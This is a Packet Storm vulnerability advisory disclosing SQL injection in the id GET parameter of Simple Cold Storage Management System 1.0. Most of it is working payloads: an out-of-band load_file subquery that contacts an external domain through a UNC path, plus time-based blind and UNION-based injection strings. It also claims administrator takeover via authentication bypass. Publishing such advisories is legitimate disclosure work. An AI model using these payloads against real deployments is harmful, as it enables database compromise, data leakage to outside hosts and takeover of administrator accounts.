Lucene search

K
packetstormNu11secur1tyPACKETSTORM:165300
HistoryDec 15, 2021 - 12:00 a.m.

Simple Cold Storage Management System 1.0 SQL Injection

2021-12-1500:00:00
nu11secur1ty
packetstormsecurity.com
201
`## Title: Simple Cold Storage Management System 1.0 SQL - Injection  
## Author: nu11secur1ty  
## Date: 12.15.2021  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html  
  
## Description:  
The id parameter from Simple Cold Storage Management System 1.0  
appears to be vulnerable to SQL injection attacks. The payload  
'+(select load_file('\\\\g3khg6jtsfhb1zn9r9a3f1g4svyomhg578vzip6e.nu11secur1tyPenetrationTestingEngineer.net\\zuz'))+'  
was submitted in the id parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
Also, the attacker can take full control of the system administrator  
account on this system by using SQL-Injection Bypass Authentication.  
  
[+] Payload:  
  
```mysql  
---  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=1'+(select  
load_file('\\\\g3khg6jtsfhb1zn9r9a3f1g4svyomhg578vzip6e.nu11secur1tyPenetrationTestingEngineer.net\\zuz'))+''  
AND (SELECT 8135 FROM (SELECT(SLEEP(5)))EsVB) AND 'MsFx'='MsFx  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 5 columns  
Payload: id=1'+(select  
load_file('\\\\g3khg6jtsfhb1zn9r9a3f1g4svyomhg578vzip6e.nu11secur1tyPenetrationTestingEngineer.net\\zuz'))+''  
UNION ALL SELECT  
NULL,NULL,NULL,CONCAT(0x7176627071,0x685558464d466d7a6b5878585a53514a6859754e5651584e705557616d6354616f574f6646637452,0x716a787a71),NULL,NULL,NULL,NULL--  
-  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/CSMS-1.0)  
  
## Proof and Exploit:  
[href](https://streamable.com/l2u7an)  
  
  
`